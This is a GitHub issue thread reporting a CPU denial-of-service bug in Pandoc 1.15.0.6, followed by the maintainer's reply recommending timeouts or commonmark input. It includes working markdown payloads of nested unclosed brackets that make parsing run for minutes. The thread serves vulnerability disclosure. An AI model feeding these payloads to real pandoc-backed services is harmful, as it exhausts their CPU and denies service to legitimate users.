### ISSUE TITLE
CPU Denial of Service in Pandoc

### ISSUE THREAD

**Issue by Javantea** [jgm/pandoc#2398]
Version tested: 1.15.0.6

An attacker can cost the CPU arbitrary amounts of time attempting to convert an attacker supplied markdown to any other format. I'm surprised this hasn't been tested. I suppose that it's valuable to write a grammar fuzzer for each parser.

time pandoc -f markdown -t html5 -o grammar2e8755.html grammar2e8755.txt

real    0m26.565s
user    0m25.594s
sys     0m0.087s

The payload that wastes 26 seconds of CPU is:
```
[0
[1
[2
[3
[4
[5
[6
[7
[8
[9
[a
[b
[c
[d
[e
[f
[g
[h
[i
```
To waste more CPU time, just add more. This one below wastes more than 12 minutes (I gave up after waiting 12 minutes).
```
[0
[1
[2
[3
[4
[5
[6
[7
[8
[9
[a
[b
[c
[d
[e
[f
[g
[h
[i
[j
[k
[l
[m
[n
```

**Comment by jgm** [comment]
This is essentially a dup of #1735 - closing in favor of that issue.  Feel free to comment there.

My current recommendation is to put any web-facing process that uses pandoc under a timeout.

Or, use `commonmark` instead of `markdown` input.  libcmark, which pandoc uses for commonmark conversion, has been extensively fuzz-tested, and its parser is better designed than pandoc's markdown parser.
